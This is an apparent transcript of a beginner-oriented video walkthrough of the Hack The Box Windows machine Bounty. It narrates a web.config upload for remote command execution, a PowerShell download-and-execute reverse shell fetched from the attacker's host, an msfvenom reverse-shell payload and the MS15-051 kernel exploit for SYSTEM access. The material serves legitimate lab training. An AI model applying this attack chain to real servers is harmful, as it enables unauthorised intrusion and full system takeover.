Hello everyone, this is Muted and Nuts, and today we'll be continuing our beginner-friendly Road to OSCP video series. Today we'll be looking at another hack-the-box machine, that is Bounty. Bounty is based on Windows and the difficulty is easy, so let's just get started. So first thing what I always do is I run an auto recon scan. If you guys don't know what auto recon is, it's an enumeration tool. It's gonna do Nmap scans on the target machine first, like the Bounty machine, and it's gonna do additional ports and additional services scan on those ports which are open, right? So it's gonna check for multiple things over there and it's gonna give you the output. And also the thing is that you should not always rely on this tool. Like 95% of the time it works great, but sometimes you have to manually enumerate things further. So this is what AutoRecon does, and it's available on GitHub. So I use it for all the boxes, and if I don't find anything, I manually enumerate things further. So I'll run it as sudo because I'm going to run it as root. So I'll be giving sudo over here, since I'm running the box as Kali. So I'll be giving Python 3 over here to run this AutoRecon file. I'll be giving the target IP address, that is 10.10.10.93 in the case of Bounty, and I'll be giving the O switch over here for output. So wherever you want to save the scan result. Okay, so I did already execute the scan, so I would not execute it again. So let's just look at the scan results. So first thing is we come to the scan directory and we look at the full TCP Nmap scan. So if we look over here, there is only one port open, that is port 80, that is running HTTP service over here. Okay, this is open, and obviously the web server is like Microsoft IIS HTTP D 7.5. So you probably can go and check out for any exploits over here, but I could not find any. So since we have only one port open, sometimes it's like, you think that obviously it did not enumerate it well, so you can do a slow Nmap scan. So if you missed anything over there, so probably that the slow scan will catch it. So let's just look at this port 80 since we have only one thing present over here. Okay, so let's just do that. And so we come across this image over here, okay, and that's it. We do not have anything else. So we do view page source and we come across nothing. Like there's nothing over here and just this image file present. So if I click on it, it's the same particular file, and that's it. We do not have anything else. So obviously next thing is you try to enumerate the directories by using GoBuster. So GoBuster, I don't think it comes pre-installed with Kali. You have to go and install it manually from GitHub. So let's just look at the locate comment txt, because we need a word list to run GoBuster. So this is like, we are supplying this comment txt so that it consists like multiple words over here. So in short, it's gonna check for all these directories. Okay, so suppose if we look at like something like XML, okay, XMAS and XML files. So in short, it's gonna check for like XML and XML files and all this directory. It's gonna ask the server, and server is gonna respond whether it is present or not, based on like not found or something like not authorized to view it, or you are authorized to view it, like 200 okay. So based on that, it's gonna send you the response and it's gonna give you the result. So let's just look at the GoBuster. We'll be running GoBuster using GoBuster and the directory mode, because we want to scan the directories. We'll be giving the use switch for URL HTTP 10.10.10.93 for the URL. We'll be giving the word list, that is the comment txt which we saw earlier, and also we'll be giving the extension. So this is very important over here, and since this is a Windows box, we'll be giving multiple Windows extensions. So probably we can give like start with txt batch file, and also we can check for, we can even add py Python file. Over here we can add HTML. Also, since this is running IIS server, so obviously we can just go over here to inspect element. Let's go to network and try to reload this page. It's just going to reload this page, and let's go over there in the get request. We see that it's powered by ASP.NET, so it's using like aspx over here as well. So let's just add that as well. Okay, you can add PHP also if required, because some web application may be running using PHP as well. But we already know that it's ASPX, but let's just add that. And probably you can add the O switch for output. We can enter GoBuster 80 common extension txt. So this is what I follow usually, common txt, because sometimes I do medium scans as well, so it should not get confusing, right? You guys can mention anything you want and you can start the scan. It takes some time to complete, so I don't want to run it again because I did already execute it. And also we can give the threads over here, so we can enter T and we can enter threads, so probably like 40, because the default is like 10. So if you enter 40 over here, so it's gonna run 4 times faster. So in short, it's gonna run around this speed. Okay, so now let's just look into the scan result and see if we find something, the GoBuster scan result, right? So let's just look into that, and we see that we get 3 interesting directories over here. So let's just look at this ASP client, and it says you do not have access to it. Okay, then let's look at transfer aspx, and it says like you can browse, like obviously select some file and try to upload some file as well. So that means there's some upload functionality over here which can be more likely we can exploit it. That's the path to exploit. Okay, so let's just look at the uploads as well. Uploaded file says you do not have access. Probably it's a directory over here. So let's just see. Probably whatever we try to upload, right, in the transfer aspx, it goes to that upload files. Okay, so we have an upload functionality over, but we do not have any additional information on what kind of things we can upload, right? We have this transfer aspx file. We get some value over here. That's it. We do not have anything else. So what we'll try to do is we'll just try to upload few things. Like first thing, obviously when I did the box for the first time as well, I tried and tried to upload a image file or something, because nothing is mentioned over what we can upload, right? So I just tried to upload an image file. So I already have one test PNG file over here, and I tried to upload it, because whenever there's an upload functionality, try to upload a normal genuine file first to see what the response looks like. Okay, so let's just look at the test PNG file and try to upload it, and it says like file uploaded successfully. And let's just check if that other upload directory, right? Let's just, the upload directory which was present, uploaded files. So let's just check if our file is present over there, test.png. So so yes, the file is actually present over here. So whatever we upload is present over here as well. So initially when I tried to do this box, so obviously in PHP it's like easy, right? We can try to manipulate things, multiple things over here, and try to upload it. But in ASPX I was not successful by changing the words, like probably something like the test file to something like ASPX, something like that. So I was not able to do that. I was not successful with the image functionality over here. So I had to check on other things as well. So let's just, what we'll do is, let's just look into ASPX upload file exploit, and we come across multiple articles over here. So let's just look into these articles and see if we get something present. So we have this RC by uploading a web.config file. So this is what the title says. So what we'll try to do is, like I was able, okay, this is like a some article and POC. So let's just look into it. And in short, he says that this particular person says that web.config file was uploaded, and using web.config he got remote command execution over here. Okay, so what we'll try to do is, let's just try and see if we can upload some web.config file. Okay, we can obviously try to upload this as well, but we'll try to see if that upload successfully is successful over here. So let's just see, let's just create a document first, and let's just check out probably like web.aspx. Let's just try to upload this first and see what error message we get, so that we know that it's actually blacklisting multiple things. So let's just try to upload. It says invalid file, please try again. So this is the error which I got, trying to play around with those images as well, but I was not successful. So first thing is, we'll just try to set up a burp suit. So let's just go over here, go to your network settings, and change this to actually your localhost IP address and your port number. So next thing is, I start my burp suit. So in short, burp suit is gonna come in between over here. Many of you guys obviously may be aware, it's gonna act like a proxy. It's present in your system as itself, but it's gonna act like a proxy, and all the connections coming from your Firefox, right, your Mozilla Firefox, it's going to go to burp suit. So it's going to go over here, and then it's going to come over here. So we can try to sniff the HTTP packets, or like intercepts, and multiple things you can do with burp suit. Okay, So let's just look at HTTP. Okay, we have this. What we'll do is let's just try to upload that test PNG file again and see what a genuine upload looks like. Or what we can do is we'll just rename this web aspx now, and we'll just add web.config file for now. Just rename to that. Okay, let's see if this thing is accepted, because if that is accepted, then we can probably try to exploit this upload functionality using this article over here. Okay, so let's just do that, web.config, and we upload it. It says file uploaded successfully, so that means most likely we can try and upload this article, this thing over here. And as well, it says that it was present in Microsoft iOS 8.5 server, so probably it's present in the latest version. So obviously in 7.5 this would be exploitable as well. So what we'll try to do is we'll just check that request in burp suite. So let's just go over here, send that request to repeater. This is the same request which we had this. See, if you look at the response, it says like file uploaded successfully. This is the actual genuine request. Okay, so that's why I like having this request present over here, so that we actually can get this particular file modified by changing few things itself. Okay, so what we'll try to do is we'll just try to create a file now. Okay, and we'll try to upload using this web.config thing, this entire file over here. So let's just copy it and paste it over here first, and then later on we can try and upload the same file again. We can do it using burp as well, but I had not entered any data present over there, so obviously we have to enter data over here. But just to avoid confusion, we'll do that using this. We'll just try to upload this web.config file, and we see we have added the script over here. So if we look at the script, in short, it's calling aspx command over here. So this is what an aspx command, I guess, looks like, and it's calling a shell. That means your CMD shell. So it's like execute. It's creating an object over here, wscript shell, and then it's gonna call for this command over here. So like who am I? So it's gonna execute that, and it's gonna just output it to us. So that's what this whole command is doing. You don't need to know about each and everything over here, but yeah, we'll just look into it. Probably we'll have to modify a few things. So we upload a file and it says successful, I guess. Oh, I don't think we have uploaded yet. Just upload it. It says file uploaded successfully, and we get the request over here. So this is what the request looks like. Send it to repeater. This is what our file was, right? So obviously earlier as well we saw we have to enter after web.config over here, but just to avoid confusion, beginner friendly video. So okay, so now we have this thing set up over here, right? That means this web.config file should be present in our uploaded upload files directory. I think I just closed it, so let's just look into it again. 93 uploaded files, and now we can call for this web.config over here, and it is blank. That's it. We do not have anything. So obviously most of you guys may think that somehow this code isn't working. I guess this is not working because we do not get any output. So what we'll try to do is, we have who am I over here, right? W shell exec who am I. So who am I? So that means let's just try adding cmd command C and then add who am I, because whenever you do, sometimes we do this as well, right? Bash, we enter this particular command. So in Windows we enter cmd, and this is the C switch which will be entering. So that means it will execute this command and close, I guess. Yeah. So this is what we are entering over here, cmd/c and who am I. Let's see if this works, and let's just send this request again. So when we are sending this request over here, many of you guys may already be aware, but if you send this request, this is going to do the same thing as uploading the file. Okay, that means I modified this file to actually cmd c who am I, and I'm uploading it over here. So that's going to do the same thing. So don't get confused. I know it's a very beginner kind of a thing, but yeah. So we have the cmd who am I. We'll send this file, and it says file uploaded successfully. Okay. So now let's just look at this web.config file. Let's just hit enter again, and we have a remote command execution which looks like, so we have bounty over here, we have the username Molin over here. Okay, so that means most likely we have remote command execution. So what we can do is, we have who am I, right? We can just check for ipconfig as well. If required, we'll send the same thing over here. try to load this file. We get the IP configuration, we get the host over here. Okay, the host IP, the target IP, that is 10.10.93. That means we have remote command execution. So obviously now we have remote command execution, we have to upgrade it to a proper shell, right? So what we'll do is, next thing, let's just go to, yeah, so we can get this invoke PowerShell, Nishank PowerShell, I guess. Yeah, so we'll go to this GitHub, repository over here, and we have this shell directory, and we look at this PowerShell TCP. Okay, so let's just look into this and see. So obviously we do not have to do anything but only call this particular file. Okay, so I already have it saved in my system, so let's just get it over here to the exploit directory. Let's just open it, and the thing is, this end thing is not present. Okay, so I have just added it because I use it for my boxes, so I have added that in the end. I'll just tell you what it does. In short, this is the full file which you will get from PowerShell over here. So what we'll try to do is, this is going to give you a reverse shell, because you'll try to call this particular file using this request over here. We'll try to modify this thing, CMDC, and we'll try to get a shell. Okay, so we have Invoke Powershell over here, and we can probably just go and call the command again, this entire function command. So in short, once we add this particular thing, okay, so if we call this, so in the memory of the target machine, right, it's going to be loaded, but you have to call this later on. Then after you call, try to download this file, you'll have to call this command as well. So what I do is, most likely I try to add this particular reverse command over here. Just take that, copy it and paste it below. That means whenever it reads this entire file, right, it's going to load up in the memory in the target machine. So in the end, it's going to call this particular function, that is Invoke Powershell Tcp, that is this function. So I don't have to manually call it again second time. So it's going to do it by itself because I'm entering it in the last line over here. So let's just change this IP address. Obviously, we enter 10.10.14.28. That's my attack machine's IP address. We'll leave the port number as 4444 itself. So I just saved it over here now. So what we'll do is, we'll just go to this exploit directory, and first thing is, we'll just try to create a net. Okay, before that, we'll just start up a HTTP web server. So let's just do that first. Let's just check if that particular Invoke PowerShell TCP file is present. Yes, it is present. And what we'll try to do is, we'll just do Python 3 M. So we'll be using the Python 3 HTTP server. So we'll be giving M switch for module. We require the HTTP server module. Okay, and we'll be giving the port number, that is 8000, so that it will host web server on port 8000. So it will start over here. So it already started. In short, what we are trying to do is, we have this, okay, let's just remove this thing. Okay, so in short, what we are trying to do is, we have this bounty machine, we have remote command execution over here, right? So we have a Python server over here which is running. So a Python web server is running over here. So in short, we'll do remote command execution so that this bounty machine will connect to this Python server over here, and it's going to send out this particular invoke shell TCP file. So in short, it's going to be like, okay, take this file over here, and this invoke TCP file would execute over here. Okay, so this is what we are trying to do. So that's why we require this Python server over here. So what next thing is, we can just try and set up a netcat listener on port. Netcat, if you guys don't know what netcat is, it's a tool for connection. Okay, so connection from the target machine to the attack machine, you can have that. Sometimes you can use it for file transfers as well, but mainly we use it for like a reverse connection, so that we get a proper connection to the target machine. So we'll be giving the N for numeric IPs only, and we'll be giving V for verbose, so that we get multiple things listed over here. And we'll be giving the L switch for listening mode, that is because we are listening, right? We'll start this thing on port 4444 and we are listening over here. Okay, so that means we are waiting for the target machine, okay, that is the bounty machine, to send us a connection over here. So then after that, obviously we will be getting a proper connection. So we are listening that, and P switch is for obviously the port number. So 4444. Why 4444? Because the same thing we have entered over here as well. So let's just close this file. Close this file. We have this file over here. Obviously we save it, Control S, and close it as well. We require, we'll edit it further. We do not require this now. Okay, we'll close this as well. Okay, so we have nc nvlp 444, and we have the Python thing, Python web server running over here. So let's just call for this invoke PowerShell ps1 file. So before that, we have to obviously, since this is running cmdc, right? Probably you can enter PowerShell over here and try, but let's just see if this thing works first. So we'll enter cmd, and then we'll enter PowerShell. So from cmd we'll be calling PowerShell, and we'll be entering PowerShell. We'll be giving -c for the command, and we'll be giving iex. So this is the command which is there for Windows system, like how we use wget in Linux, right, to get a particular file, but that's not going to execute it. So this file, this command iex, is going to get a particular file from the HTTP server, and it's going to execute it, it's going to store in the memory. Okay, so that's why this is a different things, obviously Windows, Linux. So this is what we use over here for PowerShell, and we'll be using iex. We'll be creating a new object, and will be, that object would be net web client download string, and we'll be entering the HTTP URL, that is 10.10.14.28. Okay, so that is my attack machine's IP address. Don't forget the port number, that is 8000, because our Python HTTP web server is running on port 8000 over here. Okay, so that's running on 8000. Obviously it's not 000, because mentioning this because of the local machine, so that's why. So our IP address is this actually in the HackTheBox VPN. Okay, so we enter that, and obviously I missed that thing, like the code. Okay, my bad, I was entering something over here. Okay, so next thing is the file name, that is Invoke Powershell Tcp. So I just copied that, I'll paste the file name over here, and I'll close the quotes, single quotes, and I'll close the bracket as well. Okay, so we have this particular string listed over here. We close this, we can probably enter this as well, and that's it. I guess we do not require anything. Let's just try and send it. Obviously do not try to URL encode this, because we do not require this over here. So let's just leave it as it is. So just send this file and see if it is successful. Obviously it is successful. We have started our netcat listen over here, and over here we have this Python HTTP server as well. But yeah, obviously now we just send the file, right? We uploaded the file, we have to execute it as well. So what we'll try to do is, we have this web.config file, right? Let's just press enter over here and see if we get something. And we get a request over here, Python, on our Python HTTP web server, and it says like 200. And if we see over here, so obviously first the connection went to Python, right? As we saw earlier in that image, first it went to Python, then Python sent the file, and then Bounty will send us a malicious connection over here. I know it looks a bit messy, but it will send a malicious connection back to us. Okay, so this is what it does. And if we see who am I, we are over here as Bounty Merlin, and we'll be checking. Let's just go and check if we get our user flags. So let's just do dir. Let's go to users directory, dir again. Let's go to cd Merlin, then dir again. We go to cd desktop, dir. So we do not have anything over here, so we do dir a, but that does not work because we are in PowerShell. So in order to get the hidden file over there, yeah, I know many of you guys may be thinking that this file may not be present, but obviously it may be present over there because it can be hidden. So for in PowerShell, if you want to see the hidden file, so you can use get child item, and we can use this dot, because this particular directory we need to get that file, and we'll be using force over here. So the force switch, and if we see, we get our user txt file over here. Okay, so this is what it is. The length is 32 characters over here. So that means we get our user txt file. So now 32 bytes. So we get our user txt file. So that means that was user, right? So next thing is obviously come to a Windows box. I check for system info, and we have 2008 server running over here. The version is this. We have 64-bit system present over here, and also there are no patches installed. Okay, so hotfixes is NA. So we do not have anything present over here. So what we'll try to do is, let's just, obviously we can do a kernel exploit over here. So this was the path intended. I know kernel exploit limits us from multiple things, exploring new things, but this was the box, and just to show you guys how to do it, and let's just look at Sherlock PS1. We can look at the Sherlock PS1 file, and I think it is not being maintained anymore, but there is like a Watson, the newer version, but I think Watson is like for the servers to 2016, 19 and the latest Windows versions. Okay, so in short, Sherlock would be used for the older versions, I guess. So let's just look into Sherlock PS1, and let's just draw it, copy. Just copy this file, create a new document over here, Sherlock PS1, open it, paste that file. Okay, and in short, in the end, we can probably add the function as well, I guess. So new exploitable, find all worlds. So this is the function which we want to call. So let's just copy this version, this function over here. Same thing what we did in that invoke PowerShell reverse TCP, right? So we'll do this, find all worlds over here. That function will be calling, and in short it's going to check for all vulnerabilities present in this particular this kernel exploits over here, if it is vulnerable or no. So this is what it's going to do, and let's just try to run that again. Obviously we have the Python server running over here, right? So what we can do is we can do IEX, and now we don't need to enter PowerShell because already we are running PowerShell over here. Okay, so new object net client download string HTTP. Okay, 10.10.14.28, port number 8000, and we'll be giving the file name that is sherlock.ps1. Yeah, that's it, I guess. So let's just hit enter. We get the 200 response over here, and see if this thing works. Not sure why it isn't working or taking some time. Okay, so it took some time and it did execute, but we have this list over here. So we see that it says like appears vulnerable over here, but I think I tried this and I don't think it worked out. It was this one, right? Yeah, I think I had tried this particular version over here, but I don't think this worked out, the XML one. But if you guys can go ahead and try it, it will be great. And then we'll look at this MS15051. It says appears vulnerable over here as well. So let's just look into this, and we'll just copy it first and just look at the exploit. Exploit. We go over here, we come across this page, GitHub page over here, and this is the exploit present. But I don't think the compiled, it says compile, and this is the 64-bit version. Why 64-bit is because we saw over here in system info, right? the system target machine is running 64-bit OS over here, right? So that's why that is 64-bit, and so we need 64-bit version only. So the actual exploit is present, I guess, in this particular folder over here, KB3051. You can download the zip file and get the x64 version. So this is what it looks like. So let's just paste it over here, and this is what we'll be using to exploit and see if we can successfully exploit it. Obviously now we are over here as user Merlin, so we can check. Obviously we can check for multiple things over here, manual enumeration or something, but I could not find anything. So obviously that kernel exploit is a part and way to go. So what we can check is yeah, so let's just look into this file transfer now. So what we'll try to do is we'll just try to create a SMB file server in our system. So we'll be using sudo because I'm running as Kali, so you have to run it as root. So I'll be using impacket and SMB server over here, and we'll be giving the name as shared, and this is the drive name we have to give. So you can enter any drive name over here. So you guys just add shared, or probably you can enter something like I can enter something like muted and nuts, and also the path which I want to have. Okay, so I'll just create a small folder over here that is SMB probably, and I'll just copy this, probably just enter this SMB folder over here. Just delete this go buster scan which we had done earlier. So let's have this SMB folder over here, and we'll just give the path first sudo. Obviously if you're running as root, so you don't have to give that probably, and you could mention impacket over here, impacket SMB server, and the shared name, right? So this is important, which will be used over here. You can give any name, but this has to be the same one which we'll be using later on. Okay, and we'll be giving the path which the server you want to mention, right? So this is the path. So let's just press enter. Obviously it will ask for password. Give your password if you're after we have given the sudo command. Okay, so this thing has started over here. So this is how it looks like. We are in the desktop folder. We'll just try to copy a file over here as itself. So 10.10.14.28, and that's it. We do not have to give port number now because this is running a SMB server on this particular share. So we'll be giving mutated nuts over here, and then the file name, that is. So if you all realize over here there are backward slashes, in Windows there are backward slashes, and Linux there are forward slashes. So we did copy, we got some request over here, right? So that means it's successful. So let's just see. Okay, we do dir, we have this particular file in desktop directory. Okay, so let's just try to run it and see if we can get some information. We run it and it says not recognized. Obviously you have to give this dot and backward slash, paste it, and it says the command is like who am I all, something like that. So okay, so enter this exe, enter the command who am I, and it says we are over here as system. Okay, so in short we have remote command execution as system, that means administrator probably. So what we'll try to do is, next thing we can just try to create a MSF Venom payload over here itself on the SMB server. So we'll be creating MSF Venom, and we'll be giving the payload, that is P, and P for P. MSF Venom is, you can use MSF Venom for as many exploits as you like in the OSCP exam as well. It's written in their website as well, official website. So you can do that. So probably just use MSF Venom to create such Windows payloads. We can use MSF Venom as P. Yeah, we'll be giving the P switch. We'll be entering Windows. We'll be entering the x64 version now because we have the x64 OS. So we'll be giving shell reverse TCP. Then we'll be giving the L host, that is your local host, that is the attack machine's IP address, that is 10.10.14.28. Then we'll be giving the L port, that is, we can give a different port now, not the same as 4444. We'll be giving 5555. Okay, and we'll be giving the file type, that is exe. We'll just have an executable file, and also we'll be giving the output switch, that is O, that is we can mention as reverse exe. It takes some time to actually create the payload. Okay, so the payload is done over here. It's present on the SMB file. We have the payload present over here, reverse.exe. Let's just try to copy it into our system. So let's just copy the command over here. Not the entire one, but yes, reverse.exe. Okay, so that's done. So what we'll try to do is quickly, before running a remote command execution as some other user, always try to, this is what I do as well, like I just try to check if that particular exploit file is running fine or no. Okay, so let's just do reverse exe first and see that. Obviously we'll just check first if the file is present over here. Reverse exe is present, so let's just execute that reverse exe file and see if we get a connection over here. Obviously we'll get as the same low level user, but at least we'll know that the exploit is working fine, so that in privilege escalation we do not have to, you know, break our heads over there. Okay, so why it's not working. So if we see, we get our shell over here, but obviously the user is same. So let's just close this for now, clear, and start the shell again. Now we'll be using this same command, that is the MSF. We'll just try to execute this file. So let's just copy it, paste it. Now we'll enter this reverse exe file over here and see if it executes, and we have a shell over here. So if we do who am I, we are over here as system. Okay, so that means we get system shell over here. So I know it's kernel exploit, it's like very easy just to find the right exploit and try to do it. There's not much thing, like, you know, not much you can do over here, but yeah. So this was the box, and let's just go to dir cd users, dir cd administrator, dir. So that means we have admin access. Obviously just go to desktop, dir, we have our root txt file over here. So this was the box, very easy. First part was a bit tricky, I guess, because to, you know, probably you understand that you have to upload an image file, try to modify that. I was not successful over there, so obviously I had to go on Google and check out for any exploits. So we come across that remote command execution script over here. So this worked perfectly fine, but obviously we had to change this who am I thing over here. It looks like, you know, this script is not working. So it looks like that, but obviously just, you know, we can enter CMDC. So this is how it was, and this was the box. So if you guys like the video, do give a thumbs up, and if do subscribe for more upcoming videos. If you all have any queries, do mention in the comments below. Okay, and thanks a lot for watching the video.